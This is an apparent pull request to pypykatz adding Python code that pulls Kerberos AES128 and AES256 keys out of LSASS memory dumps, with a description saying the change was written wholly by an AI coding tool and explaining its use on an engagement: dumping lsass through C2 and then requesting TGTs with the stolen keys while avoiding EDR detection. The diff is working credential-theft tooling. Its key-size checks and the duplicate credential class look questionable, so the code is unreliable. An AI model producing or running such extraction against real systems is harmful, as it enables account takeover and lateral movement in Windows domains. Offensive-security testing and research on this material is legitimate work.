### PR TITLE
aesKey extraction

### DIFF
--- a/pypykatz/lsadecryptor/packages/kerberos/decryptor.py
+++ b/pypykatz/lsadecryptor/packages/kerberos/decryptor.py
@@ -21,6 +21,8 @@ class KerberosCredential:
 		self.pin:str = None
 		self.pin_raw:bytes = None
 		self.cardinfo = None
+		self.aes_key128 = None
+		self.aes_key256 = None
 		
 	def __str__(self):
 		t = '\t== Kerberos ==\n'
@@ -38,6 +40,10 @@ class KerberosCredential:
 			t += '\t\t\tReaderName: %s\n' % self.cardinfo['ReaderName']
 			t += '\t\t\tContainerName: %s\n' % self.cardinfo['ContainerName']
 			t += '\t\t\tCSPName: %s\n' % self.cardinfo['CSPName']
+		if self.aes_key128:
+			t += '\t\tAES128 Key: %s\n' % self.aes_key128.hex()
+		if self.aes_key256:
+			t += '\t\tAES256 Key: %s\n' % self.aes_key256.hex()
 
 		# TODO: check if users actually need this.
 		# I think it's not useful to print out the kerberos ticket data as string, as noone uses it directly.
@@ -61,7 +67,10 @@ class KerberosCredential:
 		t['tickets'] = []
 		for ticket in self.tickets:
 			t['tickets'] = ticket.to_dict()
-		
+		if self.aes_key128:
+			t['aes128'] = self.aes_key128.hex()
+		if self.aes_key256:
+			t['aes256'] = self.aes_key256.hex()
 		return t
 		
 
@@ -125,13 +134,40 @@ class KerberosDecryptor(PackageDecryptor):
 		
 		self.current_cred.username = kerberos_logon_session.credentials.UserName.read_string(self.reader)
 		self.current_cred.domainname = kerberos_logon_session.credentials.Domaine.read_string(self.reader)
-		#if self.current_cred.username.endswith('$') is True:
-		#	self.current_cred.password, self.current_cred.password_raw = self.decrypt_password(kerberos_logon_session.credentials.Password.read_maxdata(self.reader), bytes_expected=True)
-		#	if self.current_cred.password is not None:
-		#		self.current_cred.password = self.current_cred.password.hex()
-		#else:
-		#	self.current_cred.password, self.current_cred.password_raw = self.decrypt_password(kerberos_logon_session.credentials.Password.read_maxdata(self.reader))
-		self.current_cred.password, self.current_cred.password_raw = self.decrypt_password(kerberos_logon_session.credentials.Password.read_maxdata(self.reader))
+		
+		# Extract keys from pKeyList
+		if kerberos_logon_session.pKeyList.value != 0:
+			key_list = kerberos_logon_session.pKeyList.read(self.reader, override_finaltype = self.decryptor_template.keys_list_struct)
+			key_list.read(self.reader, self.decryptor_template.hash_password_struct)
+			
+			for key in key_list.KeyEntries:
+				if key.generic.Size > 0:
+					if key.generic.Size <= 24: # AES128
+						keydata = key.generic.Checksump.read_raw(self.reader, key.generic.Size)
+						if keydata:
+							dec_key, _ = self.decrypt_password(keydata, bytes_expected=True)
+							if dec_key:
+								self.current_cred.aes_key128 = dec_key
+					elif key.generic.Size <= 32: # AES256
+						keydata = key.generic.Checksump.read_raw(self.reader, key.generic.Size)
+						if keydata:
+							dec_key, _ = self.decrypt_password(keydata, bytes_expected=True)
+							if dec_key:
+								self.current_cred.aes_key256 = dec_key
+		
+		# Process normal password if present
+		if kerberos_logon_session.credentials.Password.Length != 0:
+			if self.current_cred.username.endswith('$') is True:
+				self.current_cred.password, self.current_cred.password_raw = self.decrypt_password(
+					kerberos_logon_session.credentials.Password.read_maxdata(self.reader), 
+					bytes_expected=True
+				)
+				if self.current_cred.password is not None:
+					self.current_cred.password = self.current_cred.password.hex()
+			else:
+				self.current_cred.password, self.current_cred.password_raw = self.decrypt_password(
+					kerberos_logon_session.credentials.Password.read_maxdata(self.reader)
+				)
 		
 		if kerberos_logon_session.SmartcardInfos.value != 0:
 			csp_info = kerberos_logon_session.SmartcardInfos.read(self.reader, override_finaltype = self.decryptor_template.csp_info_struct)
@@ -140,71 +176,6 @@ class KerberosDecryptor(PackageDecryptor):
 			if csp_info.CspDataLength != 0:
 				self.current_cred.cardinfo = csp_info.CspData.get_infos()
 
-		#### key list (still in session) this is not a linked list (thank god!)
-		if kerberos_logon_session.pKeyList.value != 0:
-			key_list = kerberos_logon_session.pKeyList.read(self.reader, override_finaltype = self.decryptor_template.keys_list_struct)
-			#print(key_list.cbItem)
-			key_list.read(self.reader, self.decryptor_template.hash_password_struct)
-			for key in key_list.KeyEntries:
-				pass
-				### GOOD
-				#keydata_enc = key.generic.Checksump.read_raw(self.reader, key.generic.Size)
-				#print(keydata_enc)
-				#keydata, raw_dec = self.decrypt_password(keydata_enc, bytes_expected=True)
-				#print(keydata_enc.hex())
-				#input('KEY?')
-
-
-				#print(key.generic.Checksump.value)
-				
-				#self.log_ptr(key.generic.Checksump.value, 'Checksump', datasize = key.generic.Size)
-				#if self.reader.reader.sysinfo.BuildNumber < WindowsBuild.WIN_10_1507.value and key.generic.Size > LSAISO_DATA_BLOB.size:
-				#	if key.generic.Size <= LSAISO_DATA_BLOB.size + (len("KerberosKey") - 1) + 32: #AES_256_KEY_LENGTH
-				#		input('1')
-				#		data_blob = key.generic.Checksump.read(self.reader, override_finaltype = LSAISO_DATA_BLOB)
-				#		data_blob.read(self.reader, key.generic.Size - LSAISO_DATA_BLOB.size)
-				#		
-				#		input('data blob end')
-				#		"""
-				#		kprintf(L"\n\t   * LSA Isolated Data: %.*S", blob->typeSize, blob->data);
-				#		kprintf(L"\n\t     Unk-Key  : "); kull_m_string_wprintf_hex(blob->unkKeyData, sizeof(blob->unkKeyData), 0);
-				#		kprintf(L"\n\t     Encrypted: "); kull_m_string_wprintf_hex(blob->data + blob->typeSize, blob->origSize, 0);
-				#		kprintf(L"\n\t\t   SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize);
-				#		kprintf(L"\n\t\t   0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4);
-				#		kull_m_string_wprintf_hex(blob->unkData2, sizeof(blob->unkData2), 0); kprintf(L", 5:0x%x", blob->unk5);
-				#		"""
-				#	else:
-				#		input('2')
-				#		key.generic.Checksump.read(self.reader, override_finaltype = LSAISO_DATA_BLOB)
-				#		print('unkData1 : %s' % data_struct.unkData1.hex())
-				#		print('unkData2 : %s' % data_struct.unkData2.hex())
-				#		print('Encrypted : %s' % data_struct.data.hex()) #another extra struct should wrap this data! ENC_LSAISO_DATA_BLOB
-				#		
-				#else:
-				#	
-				#	if self.reader.reader.sysinfo.BuildNumber < WindowsBuild.WIN_VISTA.value:
-				#		input('3')
-				#		key.generic.Checksump.read(self.reader, override_finaltype = LSAISO_DATA_BLOB)
-				#		print('unkData1 : %s' % data_struct.unkData1.hex())
-				#		print('unkData2 : %s' % data_struct.unkData2.hex())
-				#		print('Encrypted : %s' % data_struct.data.hex()) #another extra struct should wrap this data! ENC_LSAISO_DATA_BLOB
-				#		
-				#	else:
-				#		input('4')
-				#		#we need to decrypt as well!
-				#		self.reader.move(key.generic.Checksump.value)
-				#		enc_data = self.reader.read(key.generic.Size)
-				#		print(hexdump(enc_data))
-				#		dec_data = self.lsa_decryptor.decrypt(enc_data)
-				#		print(hexdump(dec_data))
-				#		t_reader = GenericReader(dec_data)
-				#		data_struct = LSAISO_DATA_BLOB(t_reader)
-				#		print('unkData1 : %s' % data_struct.unkData1.hex())
-				#		print('unkData2 : %s' % data_struct.unkData2.hex())
-				#		print('Encrypted : %s' % data_struct.data.hex()) #another extra struct should wrap this data! ENC_LSAISO_DATA_BLOB
-				#
-				#input()
-		
 		if self.with_tickets is True:
 			if kerberos_logon_session.Tickets_1.Flink.value != 0 and \
 					kerberos_logon_session.Tickets_1.Flink.value != kerberos_logon_session.Tickets_1.Flink.location and \

--- a/pypykatz/lsadecryptor/packages/kerberos/templates.py
+++ b/pypykatz/lsadecryptor/packages/kerberos/templates.py
@@ -1119,3 +1119,71 @@ class KIWI_KERBEROS_BUFFER:
 	def read(self, reader):
 		self.Data = self.Value.read_raw(reader, self.Length)
 		return self.Data
+
+class KerberosHashPassword:
+	def __init__(self):
+		self.salt = None  # Unicode string
+		self.iterations = None  # Usually 4096 for AES
+		self.aes128 = None
+		self.aes256 = None
+
+class KerberosCredential:
+	def __init__(self):
+		self.luid = None
+		self.username = None
+		self.domainname = None
+		self.password = None
+		self.password_raw = None
+		self.aes_key128 = None
+		self.aes_key256 = None
+		
+	def __str__(self):
+		t = '\t\t== Kerberos ==\n'
+		t += '\t\tUsername: %s\n' % self.username
+		t += '\t\tDomain: %s\n' % self.domainname
+		if self.password:
+			t += '\t\tPassword: %s\n' % self.password
+		if self.aes_key128:
+			t += '\t\tAES128 Key: %s\n' % self.aes_key128.hex()
+		if self.aes_key256:
+			t += '\t\tAES256 Key: %s\n' % self.aes_key256.hex()
+		return t
+		
+	def to_dict(self):
+		t = {}
+		t['credtype'] = 'kerberos'
+		t['username'] = self.username
+		t['domainname'] = self.domainname
+		t['password'] = self.password
+		t['password_raw'] = self.password_raw
+		if self.aes_key128:
+			t['aes128'] = self.aes_key128.hex()
+		if self.aes_key256:
+			t['aes256'] = self.aes_key256.hex()
+		return t
+
+	def to_grep_line(self):
+		lines = []
+		if self.aes_key128:
+			lines.append('kerberos\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s' % (
+				self.username, 
+				self.domainname, 
+				'', 
+				'', 
+				'', 
+				self.aes_key128.hex(),
+				'',
+				''
+			))
+		if self.aes_key256:
+			lines.append('kerberos\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s' % (
+				self.username,
+				self.domainname,
+				'',
+				'',
+				'',
+				'',
+				self.aes_key256.hex(),
+				''
+			))
+		return lines


### PR DESCRIPTION
*This PR was written 100% with cursor AI*

I am not a good programmer, let alone understanding how crypto functions work, however I was able to get limited changes to the code using cursor's AI to create code to extract AES keys from an lsass dump.

## Purpose:

Purpose of this PR is to create similar output to the [mimikatz](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#ekeys) `sekulrsa::ekeys` module.

## Reason:

During a recent engagement, RC4 protocol was disabled on the domain and therefore unable to create TGT tickets with impacket's `getTGT.py` function, even when the NT hash was obtained. And due to EDR deployment, using NTLM auth (RC4) would flag accounts and put them into EDR jail.

## Solution:

By obtaining lsass dump files through C2, using the dump files to extract aesKeys allows the use of `getTGT.py` with the `aesKey` option and still being able to generate a TGT ticket with a supported protocol.

Files modified:

`pypykatz/lsadecryptor/packages/kerberos/templates.py` - class modification in order to allow for kerberos aesKey extraction
`pypykatz/lsadecryptor/packages/kerberos/decryptor.py` - logic to extract aesKey

## Example Output:

```bash
pypykatz lsa minidump lsass.dmp
```

![image](https://github.com/user-attachments/assets/ea7003fc-497c-4d3b-bba7-cba4cb9c110a)
